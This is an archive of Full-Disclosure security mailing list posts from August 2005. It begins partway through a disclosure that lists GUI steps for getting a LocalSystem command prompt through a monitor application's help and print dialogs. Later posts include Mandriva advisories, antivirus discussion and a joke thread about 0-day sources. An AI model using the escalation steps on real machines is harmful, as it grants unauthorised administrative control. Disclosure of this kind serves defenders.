   of the screen and click Open the Monitor.

2. Click the Profiles tab and click Import.

2. Right click on the Open button and click What's This?

3. Right click on the help text that is shown in yellow and click Print Topic.

4. Right click on any printer and click Open.

5. Click Help, Help Topics.

6. Right click in the right side of the help screen and click View Source.

7. Notepad will appear (running under the context of the LocalSystem account).
   Click File, click Open.

8. Change Files of type: to All Files, navigate to the system32 directory and
   locate cmd.exe. Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the LocalSystem
account.

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Crg

o/

Im root on this box (kinoko), pliz give me ur credit card and I will allow
you to fetch the 0days...

Gay Panda Crew 4life!!

- Original Message - 
From: "Javi Polo" <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, August 10, 2005 1:56 PM
Subject: Re: [Full-disclosure] The best 0-day exploit source


> On Aug/10/2005, [EMAIL PROTECTED] wrote:
>
> > >can anybody suggest a website???
> > http://127.0.0.1/0-d-Xpl0iz
>
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
>
> [EMAIL PROTECTED]:~$
>
> who runs the site?
> I want access
>
> -- 
> Javier Polo @ Datagrama
> 902 136 126
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Mike Hoye

On Wed, Aug 10, 2005 at 01:56:04PM +0200, Javi Polo wrote:
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
> 
> [EMAIL PROTECTED]:~$ 
> who runs the site?
> I want access

You need to hack into it, obviously.


-- 
"When you get to the end zone, you should act like you've been there
before." - Jim Thorpe
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] perfect security architecture (network)

2005-08-10 Thread C0BR4

Hi All,

the point that i wanna make is "just make it simple".if i can work
with what i got.
why i have to invest .

if no tool provides 100% security.why not invest little money in
Awareness program.
policy design and specially restrict user for unnecessary applications.

thank you all for your valuable comments

C0br4
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "responsible disclosure" explanation (an

2005-08-10 Thread bugtraq

> iss forgot it's handling of the apache chunk bug:
> http://www.derkeiler.com/Mailing-Lists/ISS/2002-06/0009.html
> quote:
> --
> ISS X-Force deals with all vendors on a case-by-case basis
> to provide maximum protection for **our customers** and the community. 
> --

Last I checked Gobbles found this exploit and ISS simply reported it being 
exploited in the wild. 
Of course they are going to alert their *paying customers* before alerting the 
public mailing lists. 

- zeno
http://www.cgisecurity.com

> 
> -- 
> where do you want bill gates to go today?
> 
> On Tue, Aug 09, 2005 at 07:04:23PM -0400, Ingevaldson, Dan (ISS Atlanta) 
> wrote:
> > Just in case anyone is interested, the ISS Vulnerability Disclosure
> > Guidelines were made public a couple years ago, and last revised on July
> > 15, 2004.  The document is available here:
> > 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread bugtraq

Network: Efnet
Channel: #darknet
Nick: dvdman 

:p 


> 
> --===1105725061==
> Content-Type: multipart/alternative; 
>   boundary="=_Part_3259_4916087.1123666507888"
> 
> --=_Part_3259_4916087.1123666507888
> Content-Type: text/plain; charset=ISO-8859-1
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: inline
> 
> Hi there,
>  I'm looking for the best 0-day exploit source, a source I can really count
> on for the newest and most reliable exploits.
>  can anybody suggest a website???
>  Thx
> 
> --=_Part_3259_4916087.1123666507888
> Content-Type: text/html; charset=ISO-8859-1
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: inline
> 
> Hi there,
>  
> I'm looking for the best 0-day exploit source, a source I can rea=
> lly count
> on for the newest and most reliable exploits.
>  
> can anybody suggest a website???
>  
> Thx
> 
> --=_Part_3259_4916087.1123666507888--
> 
> --===1105725061==
> Content-Type: text/plain; charset="us-ascii"
> MIME-Version: 1.0
> Content-Transfer-Encoding: 7bit
> Content-Disposition: inline
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> --===1105725061==--
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Sean Milheim \(iDREUS Corporation\)

Title: Message



I 
second BitDefender.  Updates are fast and never have noticed it eating up 
cpu.
Regards,Sean 
MilheimiDREUS Corporation

  
  -Original Message-From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED] On Behalf Of Chuck 
  FullertonSent: Wednesday, August 10, 2005 12:42 PMTo: 
  'Jason Bethune'; full-disclosure@lists.grok.org.ukSubject: RE: 
  [Full-disclosure] Antivirus
  
  One word.  BitDefender.  
   
  more words...  New version coming out next 
  week!  not as expensive as Symantec.  Faster 
  updates..
   
  www.bitdefender.us
  
  
  From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED] On Behalf Of Jason 
  BethuneSent: Wednesday, August 10, 2005 12:21 PMTo: 
  full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] 
  Antivirus
  
  I know this is not 
  really the place to ask this question but I need some professional advice and 
  well you guys know 
  a lot. I need to get rid of our current 
  Antivirus solution in the small 20+ user network we have running on SBS 2003. 
  Currently running NAV 7.6 Corporate Edition. Any opinions on the new version 
  of Norton 10.0? Should I look at Trend 
  Micro? Both seem to priced about the same for Canadian 
  customers. I hope this is not too way off topic but I 
  don’t post here very often. If you can give 
  me some advice that 
  would be greatly appreciated.
  Jason
  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MDKSA-2005:133 - Updated netpbm packages fix temporary file vulnerabilities

2005-08-10 Thread Mandriva Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   netpbm
 Advisory ID:MDKSA-2005:133
 Date:   August 9th, 2005

 Affected versions:  10.0, 10.1, 10.2, Corporate 3.0,
 Corporate Server 2.1
 __

 Problem Description:

 Max Vozeler discovered that pstopnm, a part of the netpbm graphics
 utility suite, would call the GhostScript interpreter on untrusted
 PostScript files without using the -dSAFER option when converting a
 PostScript file into a PBM, PGM, or PNM file.  This could result in
 the execution of arbitrary commands with the privileges of the user
 running pstopnm if they could be convinced to try to convert a
 malicious PostScript file.
 
 The updated packages have been patched to correct this problem.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2471
  http://secunia.com/advisories/16184/
 __

 Updated Packages:
  
 Mandrakelinux 10.0:
 7bb710a56342cc78170bb74b37f512b0  10.0/RPMS/libnetpbm9-9.24-8.2.100mdk.i586.rpm
 7f820a3e8fcfaa705c0164cfd1b7a5c0  
10.0/RPMS/libnetpbm9-devel-9.24-8.2.100mdk.i586.rpm
 3de55337645f009ed8e951b3e97b9507  
10.0/RPMS/libnetpbm9-static-devel-9.24-8.2.100mdk.i586.rpm
 d32febe43b6b19ca7a3189b41de6d53c  10.0/RPMS/netpbm-9.24-8.2.100mdk.i586.rpm
 7d2bdf5636955adc39bfe13c4c581858  10.0/SRPMS/netpbm-9.24-8.2.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 04a7546fef5edfa604cdfd1e3dff1bc2  
amd64/10.0/RPMS/lib64netpbm9-9.24-8.2.100mdk.amd64.rpm
 f89f7f330ecb8dd8e9a536afdcfb56f0  
amd64/10.0/RPMS/lib64netpbm9-devel-9.24-8.2.100mdk.amd64.rpm
 0401393af2d5b3a933b487a1e00e3e43  
amd64/10.0/RPMS/lib64netpbm9-static-devel-9.24-8.2.100mdk.amd64.rpm
 2400c52abc020a3ac9883bc02dc77f36  
amd64/10.0/RPMS/netpbm-9.24-8.2.100mdk.amd64.rpm
 7d2bdf5636955adc39bfe13c4c581858  
amd64/10.0/SRPMS/netpbm-9.24-8.2.100mdk.src.rpm

 Mandrakelinux 10.1:
 0c7ca6675e4a1502dc450d8b31076753  10.1/RPMS/libnetpbm9-9.24-8.1.101mdk.i586.rpm
 ac327d0433d6c672e382a2c1f4dc8667  
10.1/RPMS/libnetpbm9-devel-9.24-8.1.101mdk.i586.rpm
 dee01cf52709fbbc65f3a0c21d4573d9  
10.1/RPMS/libnetpbm9-static-devel-9.24-8.1.101mdk.i586.rpm
 6c9bedecf233accd53f123f3c2a26aec  10.1/RPMS/netpbm-9.24-8.1.101mdk.i586.rpm
 8722f08f1813fb796d7b5fa8576f6045  10.1/SRPMS/netpbm-9.24-8.1.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 9b99ec325088181a931983f622c7649f  
x86_64/10.1/RPMS/lib64netpbm9-9.24-8.1.101mdk.x86_64.rpm
 119d4f558fddb4bafee84dc5da3f0c8a  
x86_64/10.1/RPMS/lib64netpbm9-devel-9.24-8.1.101mdk.x86_64.rpm
 13e9911031dc3d8b23da2157451f89a8  
x86_64/10.1/RPMS/lib64netpbm9-static-devel-9.24-8.1.101mdk.x86_64.rpm
 6637e848b29abe54142155f66ac79fb9  
x86_64/10.1/RPMS/netpbm-9.24-8.1.101mdk.x86_64.rpm
 8722f08f1813fb796d7b5fa8576f6045  
x86_64/10.1/SRPMS/netpbm-9.24-8.1.101mdk.src.rpm

 Mandrakelinux 10.2:
 4db608229fad2d6014ea506ad775e9f8  
10.2/RPMS/libnetpbm10-10.26-2.1.102mdk.i586.rpm
 4fd7e7857c692209d4c94a8a5ebe84cc  
10.2/RPMS/libnetpbm10-devel-10.26-2.1.102mdk.i586.rpm
 4521de30a4e9ee995200ae0c1443132b  
10.2/RPMS/libnetpbm10-static-devel-10.26-2.1.102mdk.i586.rpm
 a3b5efc89e18489ef2cd181b20a1dc1b  10.2/RPMS/netpbm-10.26-2.1.102mdk.i586.rpm
 52d2d1a460d07b33fbe7f6204d1cf51f  10.2/SRPMS/netpbm-10.26-2.1.102mdk.src.rpm

 Mandrakelinux 10.2/X86_64:
 37912f8c31bd31b979bfdb69ad357837  
x86_64/10.2/RPMS/lib64netpbm10-10.26-2.1.102mdk.x86_64.rpm
 928a397b673e96ed0fecdd62878aef84  
x86_64/10.2/RPMS/lib64netpbm10-devel-10.26-2.1.102mdk.x86_64.rpm
 b74c96495461b1406af317e91932500e  
x86_64/10.2/RPMS/lib64netpbm10-static-devel-10.26-2.1.102mdk.x86_64.rpm
 30ae5cd7a9e65594e30cf876f352fda6  
x86_64/10.2/RPMS/netpbm-10.26-2.1.102mdk.x86_64.rpm
 52d2d1a460d07b33fbe7f6204d1cf51f  
x86_64/10.2/SRPMS/netpbm-10.26-2.1.102mdk.src.rpm

 Corporate Server 2.1:
 f42bccdec9b6f8a432191730b85d186c  
corporate/2.1/RPMS/libnetpbm9-9.24-4.4.C21mdk.i586.rpm
 3e877555a0533572d788a4d47694bccd  
corporate/2.1/RPMS/libnetpbm9-devel-9.24-4.4.C21mdk.i586.rpm
 57dcadc0b0d94243894bccdaf17acf8a  
corporate/2.1/RPMS/libnetpbm9-static-devel-9.24-4.4.C21mdk.i586.rpm
 1fa1e01964db5302ddc773c2be67ca6b  
corporate/2.1/RPMS/netpbm-9.24-4.4.C21mdk.i586.rpm
 511aeb9ce3bdb6429e8a8ce06b873b6b  
corporate/2.1/SRPMS/netpbm-9.24-4.4.C21mdk.src.rpm

 Corporate Server 2.1/X86_64:
 6dfd39d7a3b0db15b273b2b7b7db01c4  
x86_64/corporate/2.1/RPMS/libnetpbm9-9.24-4.4.C21mdk.x86_64.rpm
 50c24455f7b43e1f7fe7581a12655c39  
x86_64/corporate/2.1/RPMS/libnetpbm9-devel-9.24-4.4.C21mdk.x86_64.rpm
 b947dcdb4226298cb90c644cce9dbd4c  
x86_64/corporate/2.1/RPMS/libnetpbm9-static-devel-9.24-4.4.C2

[Full-disclosure] MDKSA-2005:132 - Updated heartbeat packages fix temporary file vulnerabilities

2005-08-10 Thread Mandriva Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   heartbeat
 Advisory ID:MDKSA-2005:132
 Date:   August 9th, 2005

 Affected versions:  Corporate 3.0
 __

 Problem Description:

 Eric Romang discovered that Heartbeat would create temporary files with
 predictable filenames.  This could allow a local attacker to create
 symbolic links in the temporary file directory pointing to a valid file
 on the filesystem which could lead to the file being overwritten by the
 rights of the user running the vulnerable script.
 
 The updated packages have been patched to correct this problem.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2231
 __

 Updated Packages:
  
 Corporate 3.0:
 988b71b1018f73f77a94f9ac4d736ad1  
corporate/3.0/RPMS/heartbeat-1.2.3-2.1.C30mdk.i586.rpm
 6afa9bcec600cba453e97cfb8910eb66  
corporate/3.0/RPMS/heartbeat-ldirectord-1.2.3-2.1.C30mdk.i586.rpm
 02d4854a8683c467debb9a56a44123ac  
corporate/3.0/RPMS/heartbeat-pils-1.2.3-2.1.C30mdk.i586.rpm
 23618a86f47b4289e9c85732569cfc1b  
corporate/3.0/RPMS/heartbeat-stonith-1.2.3-2.1.C30mdk.i586.rpm
 c515a12308e088d3aa322de379040d0a  
corporate/3.0/RPMS/libheartbeat-pils0-1.2.3-2.1.C30mdk.i586.rpm
 cd30d48b40ed4d9c4e2e86d6fcb0d9c9  
corporate/3.0/RPMS/libheartbeat-pils0-devel-1.2.3-2.1.C30mdk.i586.rpm
 cf2081419d50b42044a69de786b3e059  
corporate/3.0/RPMS/libheartbeat-stonith0-1.2.3-2.1.C30mdk.i586.rpm
 f2cef6941e6d635f1f21fe651e9646b4  
corporate/3.0/RPMS/libheartbeat-stonith0-devel-1.2.3-2.1.C30mdk.i586.rpm
 6da3d9489adc023b552116324c70f35a  
corporate/3.0/RPMS/libheartbeat0-1.2.3-2.1.C30mdk.i586.rpm
 67f33aac7c08767c5b2df9fb71ad64aa  
corporate/3.0/RPMS/libheartbeat0-devel-1.2.3-2.1.C30mdk.i586.rpm
 0f9dc2960afa29d70f57aff6573a0559  
corporate/3.0/SRPMS/heartbeat-1.2.3-2.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1c1a953510c8d5a82c9d5774c12b915a  
x86_64/corporate/3.0/RPMS/heartbeat-1.2.3-2.1.C30mdk.x86_64.rpm
 7c9f07341f2d7e9e68df078365c05334  
x86_64/corporate/3.0/RPMS/heartbeat-ldirectord-1.2.3-2.1.C30mdk.x86_64.rpm
 5cc9ef2dbf09da3b5bad12387b9d94a0  
x86_64/corporate/3.0/RPMS/heartbeat-pils-1.2.3-2.1.C30mdk.x86_64.rpm
 972307d2bdf4396e2df0b4fd0c3f8007  
x86_64/corporate/3.0/RPMS/heartbeat-stonith-1.2.3-2.1.C30mdk.x86_64.rpm
 d2287fd3e7d1ce3cbabc8331f9f8bfea  
x86_64/corporate/3.0/RPMS/lib64heartbeat-pils0-1.2.3-2.1.C30mdk.x86_64.rpm
 5e523b3319eb3519420b9f651f6c5c01  
x86_64/corporate/3.0/RPMS/lib64heartbeat-pils0-devel-1.2.3-2.1.C30mdk.x86_64.rpm
 e3276d0abb8c2c79287fe50bf6934a8a  
x86_64/corporate/3.0/RPMS/lib64heartbeat-stonith0-1.2.3-2.1.C30mdk.x86_64.rpm
 c636cc202c0ffdb8132bcfbb5d2ed142  
x86_64/corporate/3.0/RPMS/lib64heartbeat-stonith0-devel-1.2.3-2.1.C30mdk.x86_64.rpm
 de2a839582b402dd63d9b435a956c103  
x86_64/corporate/3.0/RPMS/lib64heartbeat0-1.2.3-2.1.C30mdk.x86_64.rpm
 e05f6de07919d8dc994a83951ebf0794  
x86_64/corporate/3.0/RPMS/lib64heartbeat0-devel-1.2.3-2.1.C30mdk.x86_64.rpm
 0f9dc2960afa29d70f57aff6573a0559  
x86_64/corporate/3.0/SRPMS/heartbeat-1.2.3-2.1.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFC+lKZmqjQ0CJFipgRAiCRAKCEiLCa1CtuxcbWTjlTXtITcgsqJwCgl7Qp
Inpxe+m9REv2u+kqZLGQIT8=
=G34L
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

Thanks Axel ( love guns and roses by the way; im sure you haven't heard that
one before). I have been searching around the net for some user reviews on
those that you have mentioned. I am about a week into this research. It is
starting to come to a head in the past couple days as RTVSCAN.exe is causing
more and more computer slow downs. Not good when a batch is trying to be
posted in out financial system. In the end I need a reliable product that
has central management with lockout features to the user. Malware detection
is tied for #1 for the product I end up choosing. My users have at least
stopped opening any attachments they get that they don't know who they are
form and so on. As we all know the end user is the z factor in the whole
situation of choosing a good security product. 

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Axel Pettinger [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 3:45 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

Hi Jason,

With such a small user network you should definitely have a look at the
products of other anti virus vendors - not just Symantec's. In our
company we used NAV CE (later SAV CE) several years till 2004, but I was
never happy with it. It's bloated and its malware detection capabilities
are not very good.

Just as an example, do you know runtime compressors (like UPX)? Malware
is very often packed with such compressors to make the file smaller and
the file contents less readable. Many runtime compressors exist, but
only a few av companies make sure that the format of these runtime
compressors is known to their av scan engine so that the scanner is able
to detect malicious code inside of these packed executables. The results
are funny identifications of one and the same malware (compressed,
unpacked, repackaged with another runtime compressor). Symantec's av
scanner doesn't know the format of many runtime compressors and as a
result it usually fails to detect known packed malware when it is
unpacked or repackaged with another compressor.

My favorite av scanners are those from Kaspersky (www.kaspersky.com) and
McAfee because in my experience both have simply the best malware
detection capabilities. Kaspersky's av scanner is also very easy to
update, has small definitions, - if you want - hourly updates and knows
the most runtime compressor and archive formats of all av scanners. You
should definitely have a closer look at McAfee's and Kaspersky's av
products. As I said before they are very good in malware detection, but
in regard to performance, stability and general handling of these
products it's up to you to find out whether they're suited for your
environment.

Regards,
Axel Pettinger

> Jason Bethune wrote:
> 
> I know this is not really the place to ask this question but I need
> some professional advice and well you guys know a lot. I need to get
> rid of our current Antivirus solution in the small 20+ user network we
> have running on SBS 2003. Currently running NAV 7.6 Corporate Edition.
> Any opinions on the new version of Norton 10.0? Should I look at Trend
> Micro? Both seem to priced about the same for Canadian customers. I
> hope this is not too way off topic but I don't post here very often.
> If you can give me some advice that would be greatly appreciated.
> 
> Jason
> 
> ---
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

Hey Steve,

I have read the support article on doscan.exe causing high cpu problems. I
curious to know if that would cause a problem in my environment where we
have no dos based applications. Is the doscan.exe installed by default? We
run basically 4 servers SBS 2003, Windows Server 2000, Windows Server Web
and Windows Server 2000 for GIS Applications. All of my clients are XP Pro
with full updates using SUS. Thanks for the heads up on the SAV CE 10.0 roll
out you did...im still trying to figure out the best route for our small
government office to take on this.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca

-Original Message-
From: Steve Kirk [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 3:07 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

Hi Jason,

This last spring I was put in the position of deploying SAV CEv10.0 for 
my company - about 150 clients/servers.  Almost immediately it started 
causing problems.  I work for a video game developer for Playstation2 
games, and (sadly) a lot of the tools for PS2 are DOS-based (they're not 
Win32 apps).

First off there's an "issue" with 10.0 where doscan.exe causes high CPU 
usage - dragging the machine to a halt.  SAV does a "quick scan" (and I 
use the term loosely) on boot.  We've put in a regkey fix to remove the 
boot scan. 

They added "tamper protection" with a lot of our tools seem to trigger.  
We've had to disable that.

And generally has been responsbile for a LOT of performance problems.  
We're using high-end x86 dual-Xeon workstations, too - so it's not like 
we're under-powered.

Needless to say I'm currently doing a hefty performance analysis of 
other anti-virus solutions so I can find something "nicer" towards our 
environment.

HTH,
Steve

Jason Bethune wrote:

>I only use Terminal Services in admin mode for my servers from home. I know
>my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
>and how much resources it take sup on the computers which the client is
>installed.
>
>Jason Bethune
>
>IT Specialist
>Town of Kentville
>354 Main Street
>Kentville, NS 
>B4N 1K6
>
>www.town.kentville.ns.ca
>
>-Original Message-
>From: Steve Friedl [mailto:[EMAIL PROTECTED] 
>Sent: Wednesday, August 10, 2005 1:23 PM
>To: Jason Bethune
>Subject: Re: [Full-disclosure] Antivirus
>
>On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
>  
>
>>I know this is not really the place to ask this question but I need some
>>professional advice and well you guys know a lot. I need to get rid of our
>>current Antivirus solution in the small 20+ user network we have running
>>
>>
>on
>  
>
>>SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
>>new version of Norton 10.0? Should I look at Trend Micro? Both seem to
>>priced about the same for Canadian customers. I hope this is not too way
>>
>>
>off
>  
>
>>topic but I don't post here very often. If you can give me some advice
>>
>>
>that
>  
>
>>would be greatly appreciated.
>>
>>
>
>One tidbit: if you use RAdmin (remote administration software), Symantec
>10. corporate sees it as a threat, and there's not any really good way
>to centrally deal with this. It's been a terrible mess.
>
>Steve
>
>  
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Fw: [Full-disclosure] Antivirus

2005-08-10 Thread SACAR1

Title: Antivirus



Under My experience i just can say:
Norton : Is exellent! for handle phisical clusters 
into a hard disc ; Like antivirus NO WAY.
Bitdefender: Was exellent when was in hands of 
kaspersky labs the russian company, very good on time vaxunation now is delayed 
one week or more to provide good protection and disinfection 
tools.
NOW the best results for me:
Using Windows: www.pandasoftware.com  (titanium, 
platinium, Bussiness secure and true prevent)
Using Linux: The classic islandic www.f-prot.com 
 
Sergio L.C.
 
 


From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of Jason 
BethuneSent: Wednesday, August 10, 2005 12:21 PMTo: full-disclosure@lists.grok.org.ukSubject: 
[Full-disclosure] Antivirus

  
  I know this is not 
  really the place to ask this question but I need some professional advice and 
  well you guys know 
  a lot. I need to get rid of our current 
  Antivirus solution in the small 20+ user network we have running on SBS 2003. 
  Currently running NAV 7.6 Corporate Edition. Any opinions on the new version 
  of Norton 10.0? Should I look at Trend 
  Micro? Both seem to priced about the same for Canadian 
  customers. I hope this is not too way off topic but I 
  dont post here very often. If you can give 
  me some advice that 
  would be greatly appreciated.
  Jason
  
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Larry Seltzer

>>BitDefender. ... not as expensive as Symantec.  Faster updates.. 
 
That's another point worth making generally: everyone updates faster than
Symantec.  Symantec sends out normal updates once a week and an attack has
to be nuclear war for them to go "out of cycle."


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Pedro Hugo

Title: Antivirus



Trend Micro has a problem, pattern files. I have seen 
many virus not being detected from TrendMicro solutions.
For desktops I only have used OfficeScan. Works well, 
doesn't seem to waste too much resources.
 
Something I didn't like too from TrendMicro, was 
fixes and hotfixes. It's a bit of a mess, with some available in a few of their 
websites, and others not.


From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of Jason 
BethuneSent: quarta-feira, 10 de Agosto de 2005 17:21To: 
full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] 
Antivirus

I know this is not really 
the place to ask this question but I need some professional advice and well you 
guys know a lot. I need to get rid of our current Antivirus 
solution in the small 20+ user network we have running on SBS 2003. Currently 
running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 
10.0? Should I look at Trend Micro? Both seem to priced about the same for 
Canadian customers. I hope this is not too way off topic but I 
don’t post here very often. If you can give me some advice 
that would be greatly appreciated.
Jason

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Todd Towles

Wait, what is your IP X? I want to try this new Cicso Shellcode..lol 

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of xyberpix
> Sent: Wednesday, August 10, 2005 11:47 AM
> To: Javi Polo
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] The best 0-day exploit source
> 
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> I hear that http://::1 is also a good one
> 
> xyberpix
> 
> On 10 Aug 2005, at 12:56, Javi Polo wrote:
> 
> > On Aug/10/2005, [EMAIL PROTECTED] wrote:
> >
> >
> >>> can anybody suggest a website???
> >>>
> >> http://127.0.0.1/0-d-Xpl0iz
> >>
> >
> > [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> > --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
> >=> `0-d-Xpl0iz'
> > Connecting to 127.0.0.1:80... connected.
> > HTTP request sent, awaiting response... 403 Forbidden
> > 13:55:05 ERROR 403: Forbidden.
> >
> > [EMAIL PROTECTED]:~$
> >
> > who runs the site?
> > I want access
> >
> > --
> > Javier Polo @ Datagrama
> > 902 136 126
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.1 (Darwin)
> 
> iD8DBQFC+i91cRMkOnlkwMERApVtAKCEYEB83FhiFcgtOZGvznEDW3rjZQCfY7mv
> 4bYlcJ5Xe6UvLI9QO6Zji9w=
> =PLGC
> -END PGP SIGNATURE-
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread xyberpix


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I hear that http://::1 is also a good one

xyberpix

On 10 Aug 2005, at 12:56, Javi Polo wrote:


On Aug/10/2005, [EMAIL PROTECTED] wrote:



can anybody suggest a website???


http://127.0.0.1/0-d-Xpl0iz



[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--13:55:05--  http://127.0.0.1/0-d-Xpl0iz
   => `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$

who runs the site?
I want access

--
Javier Polo @ Datagrama
902 136 126
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (Darwin)

